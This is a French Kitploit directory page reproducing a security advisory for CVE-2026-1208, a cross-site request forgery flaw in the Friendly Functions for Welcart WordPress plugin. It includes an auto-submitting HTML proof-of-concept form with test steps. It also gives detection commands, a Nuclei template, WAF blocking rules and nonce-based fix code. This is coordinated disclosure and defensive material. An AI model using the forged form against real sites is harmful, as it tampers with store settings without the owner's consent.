Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-1208 — Friendly Functions for Welcart <= 1.2.5 - Falsification de requête intersite pour mise à jour des paramètres | Kitploit
Outils/GitHubGitHub/snailsploit/cve-2026-1208
Analyse des VulnérabilitésExploitationSécurité WebTests d'IntrusionArticles et RechercheApprentissage et Éducation
GitHubsnailsploit/cve-2026-1208

CVE-2026-1208

Friendly Functions for Welcart <= 1.2.5 - Falsification de requête intersite pour mise à jour des paramètres

Voir le dépôt
1il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-1208 : Falsification de requête intersite dans Friendly Functions pour Welcart

CVE CVSS Score WordPress Plugin CWE-352 Wordfence

Mots-clés : CVE-2026-1208, vulnérabilité Friendly Functions for Welcart, CSRF, falsification de requête intersite, sécurité WordPress, vulnérabilité de plugin WordPress, CWE-352, sécurité Welcart, manipulation des paramètres, WordPress CVE 2026

Table des matières

  • Aperçu
  • Détails de la vulnérabilité
  • Analyse technique
  • Vecteur d'attaque
  • Preuve de concept
  • Guide de remédiation
  • Métriques CVSS
  • Références
  • Contact sécurité
  • Aperçu

    Vulnérabilité CSRF du plugin WordPress Friendly Functions for Welcart (CVE-2026-1208) - Défaut de sécurité permettant à des attaquants non authentifiés de modifier les paramètres du plugin via des requêtes forgées.

    Une vulnérabilité de type falsification de requête intersite (CSRF) a été découverte dans le plugin Friendly Functions for Welcart ; elle permet à des attaquants non authentifiés de modifier les paramètres du plugin en trompant un administrateur pour qu'il clique sur un lien malveillant.

    Découverte par : Kai Aizen (SnailSploit)
    Publié : 23 janvier 2026
    Score CVSS : 4.3 (Moyen)
    CWE : CWE-352 - Falsification de requête intersite (CSRF)
    Plugin : Friendly Functions for Welcart
    Type d'attaque : Falsification de requête intersite vers mise à jour des paramètres
    Privilèges requis : Aucun (attaque non authentifiée + ingénierie sociale)

    Détails de la vulnérabilité

    Description

    Le plugin Friendly Functions for Welcart pour WordPress est vulnérable à une falsification de requête intersite dans toutes les versions jusqu'à la version 1.2.5 incluse. Cela est dû à une validation de nonce manquante ou incorrecte sur la page des paramètres. Ainsi, des attaquants non authentifiés peuvent modifier les paramètres du plugin via une requête forgée, à condition de pouvoir tromper un administrateur du site pour qu'il exécute une action telle que cliquer sur un lien.

    Impact

    Cette vulnérabilité permet à des attaquants non authentifiés de :

    • Modifier les paramètres du plugin sans autorisation
    • Manipuler les fonctionnalités e-commerce de Welcart
    • Potentiellement perturber les opérations de la boutique
    • Chaîner avec d'autres vulnérabilités pour des attaques à plus grande échelle

    Versions affectées

    • Vulnérables : Toutes les versions ≤ 1.2.5
    • Corrigées : Version 1.2.6 et ultérieures

    Métriques CVSS v3.1

    root@kitploit:~
    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
    
    MétriqueValeur
    Vecteur d'attaqueRéseau (AV:N)
    Complexité de l'attaqueFaible (AC:L)
    Privilèges requisAucun (PR:N)
    Interaction de l'utilisateurRequise (UI:R)
    PérimètreInchangé (S:U)
    ConfidentialitéAucune (C:N)
    IntégritéFaible (I:L)
    DisponibilitéAucune (A:N)

    Détails techniques

    La vulnérabilité existe dans l'implémentation de la page des paramètres, où :

    1. Le formulaire de paramètres du plugin manque de validation de nonce correcte
    2. Les requêtes de mise à jour des paramètres sont traitées sans vérifier l'origine de la requête
    3. Aucun jeton CSRF n'est généré ni validé
    4. Des actions administratives peuvent être effectuées via des requêtes cross-origin

    Emplacements du code vulnérable

    La vulnérabilité a été identifiée aux emplacements suivants :

    • ffw_function_settings.php - Ligne 53
    • ffw_function_settings.php - Ligne 58

    Vecteur d'attaque

    L'attaque nécessite de l'ingénierie sociale pour tromper un administrateur authentifié afin qu'il visite une page malveillante ou clique sur un lien conçu à cet effet alors qu'il est connecté à son site WordPress.

    root@kitploit:~
    Target: WordPress Admin with Friendly Functions for Welcart installed
    Method: Malicious HTML page with auto-submitting form
    Trigger: Administrator clicks link or visits attacker-controlled page
    

    Preuve de concept

    Payload CSRF HTML

    root@kitploit:~
    <!DOCTYPE html>
    <html>
    <head>
        <title>CVE-2026-1208 - CSRF PoC</title>
    </head>
    <body>
        <h1>Loading...</h1>
        <form id="csrf-form" action="https://TARGET_SITE/wp-admin/admin.php?page=ffw-settings" method="POST">
            <input type="hidden" name="ffw_setting_option" value="malicious_value" />
            <!-- Add additional setting fields as needed -->
        </form>
        <script>
            document.getElementById('csrf-form').submit();
        </script>
    </body>
    </html>
    

    ⚠️ Avertissement : Cette preuve de concept est fournie à des fins éducatives et de test autorisé uniquement.

    Étapes de test

    1. Installer une instance WordPress avec Friendly Functions for Welcart <= 1.2.5
    2. Héberger le payload CSRF sur un serveur contrôlé par l'attaquant
    3. S'authentifier en tant qu'administrateur sur le site WordPress cible
    4. Visiter la page contrôlée par l'attaquant (simulant un clic sur un lien malveillant)
    5. Constater que les paramètres du plugin sont modifiés sans consentement explicite

    Détection

    Vérification du plugin WordPress

    root@kitploit:~
    # Check if vulnerable version is installed
    wp plugin list | grep -i "friendly-functions-for-welcart"
    
    # Get specific version
    wp plugin get friendly-functions-for-welcart --field=version
    

    Règles de scanner de sécurité

    Modèle Nuclei :

    root@kitploit:~
    id: CVE-2026-1208
    
    info:
      name: Friendly Functions for Welcart - CSRF to Settings Update
      author: SnailSploit
      severity: medium
      description: |
        Friendly Functions for Welcart plugin for WordPress is vulnerable 
        to CSRF in versions <= 1.2.5 due to missing nonce validation.
      reference:
        - https://github.com/SnailSploit/CVE-2026-1208
        - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/friendly-functions-for-welcart/friendly-functions-for-welcart-125-cross-site-request-forgery-to-settings-update
      classification:
        cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
        cvss-score: 4.3
        cve-id: CVE-2026-1208
        cwe-id: CWE-352
      tags: cve,cve2026,wordpress,wp-plugin,csrf,welcart
    
    requests:
      - method: GET
        path:
          - "{{BaseURL}}/wp-content/plugins/friendly-functions-for-welcart/readme.txt"
        
        matchers-condition: and
        matchers:
          - type: word
            words:
              - "Friendly Functions for Welcart"
          
          - type: regex
            regex:
              - "(?i)Stable tag:\\s*(1\\.([0-1]\\.[0-9]|2\\.[0-5]))"
          
          - type: status
            status:
              - 200
    
        extractors:
          - type: regex
            name: version
            group: 1
            regex:
              - "(?i)Stable tag:\\s*([0-9.]+)"
    

    Règles de pare-feu d'application web

    Règle ModSecurity :

    root@kitploit:~
    # CVE-2026-1208 - Block CSRF attempts to FFW settings
    SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
        "chain,id:2026001,phase:2,t:none,t:urlDecodeUni,\
        log,deny,status:403,msg:'CVE-2026-1208 CSRF Attempt Blocked'"
        SecRule ARGS:page "@streq ffw-settings" \
            "chain"
            SecRule &REQUEST_HEADERS:Referer "@eq 0"
    
    # Alternative: Block if referer doesn't match site domain
    SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
        "chain,id:2026002,phase:2,t:none,\
        log,deny,status:403,msg:'CVE-2026-1208 Cross-Origin Request Blocked'"
        SecRule ARGS:page "@streq ffw-settings" \
            "chain"
            SecRule REQUEST_HEADERS:Referer "!@contains yourdomain.com"
    

    Règle Nginx :

    root@kitploit:~
    # CVE-2026-1208 - CSRF Protection for FFW Settings
    location /wp-admin/admin.php {
        # Check for ffw-settings page without proper referer
        if ($arg_page = "ffw-settings") {
            set $csrf_check "1";
        }
        if ($http_referer !~ "^https?://(www\.)?yourdomain\.com") {
            set $csrf_check "${csrf_check}1";
        }
        if ($csrf_check = "11") {
            return 403;
        }
        
        # Pass to PHP handler
        try_files $uri =404;
        fastcgi_pass php-fpm;
        include fastcgi_params;
    }
    

    Remédiation

    Pour les administrateurs de site

    Action immédiate requise :

    1. Mettez immédiatement à jour Friendly Functions for Welcart vers la version 1.2.6 ou ultérieure
    2. Vérifiez les paramètres du plugin de votre site pour toute modification non autorisée
    3. Si vous ne pouvez pas mettre à jour immédiatement, envisagez de désactiver temporairement le plugin

    Instructions de mise à jour

    1. Accédez à Plugins > Plugins installés dans l'administration WordPress
    2. Localisez « Friendly Functions for Welcart »
    3. Cliquez sur Mettre à jour maintenant pour passer à la version 1.2.6 ou ultérieure
    4. Vérifiez que la mise à jour a réussi
    5. Vérifiez et confirmez que les paramètres de votre plugin sont corrects

    Pour les développeurs

    Assurez-vous que tous les formulaires de paramètres implémentent une protection CSRF adéquate :

    root@kitploit:~
    // Example of proper CSRF protection in WordPress
    // In your form:
    wp_nonce_field('ffw_settings_update', 'ffw_settings_nonce');
    
    // In your form handler:
    function process_settings_update() {
        // Verify nonce
        if (!isset($_POST['ffw_settings_nonce']) || 
            !wp_verify_nonce($_POST['ffw_settings_nonce'], 'ffw_settings_update')) {
            wp_die('Security check failed');
        }
        
        // Check capabilities
        if (!current_user_can('manage_options')) {
            wp_die('Unauthorized');
        }
        
        // Process settings update
        // ...
    }
    

    Chronologie

    • 23 janvier 2026 - Vulnérabilité divulguée publiquement
    • 23 janvier 2026 - CVE-2026-1208 attribué
    • Version 1.2.6 - Correctif publié par l'éditeur du plugin

    Références

    • Entrée de la base de données Wordfence Intelligence
    • WordPress Plugin Trac - Ligne 53
    • WordPress Plugin Trac - Ligne 58
    • Modification du plugin (correctif)
    • Entrée CVE MITRE

    Crédits

    Chercheur :

    • Kai Aizen - SnailSploit

    Processus de divulgation : Coordonné via le programme Bug Bounty de Wordfence

    Avertissement

    Ces informations sont fournies uniquement à des fins de recherche en sécurité et de défense. Toute exploitation de cette vulnérabilité à des fins malveillantes est illégale et contraire à l'éthique. Obtenez toujours une autorisation appropriée avant de tester des systèmes qui ne vous appartiennent pas.

    Contact

    Pour toute question ou information supplémentaire sur cette vulnérabilité :

    • E-mail : [email protected]
    • Site web : snailsploit.com
    • Organisation : SnailSploit Security Research

    Dernière mise à jour : 23 janvier 2026


    📚 Documentation et auteur

    Le rapport complet, la méthodologie et les recherches connexes de ce projet se trouvent sur :

    https://snailsploit.com/security-research/cves/cve-2026-1208/

    Créé par Kai Aizen — chercheur indépendant en sécurité offensive.

    snailsploit.com · Recherche · Frameworks · GitHub · LinkedIn · ResearchGate · X/Twitter

    Même attaque. Substrat différent.

    Télécharger l’outil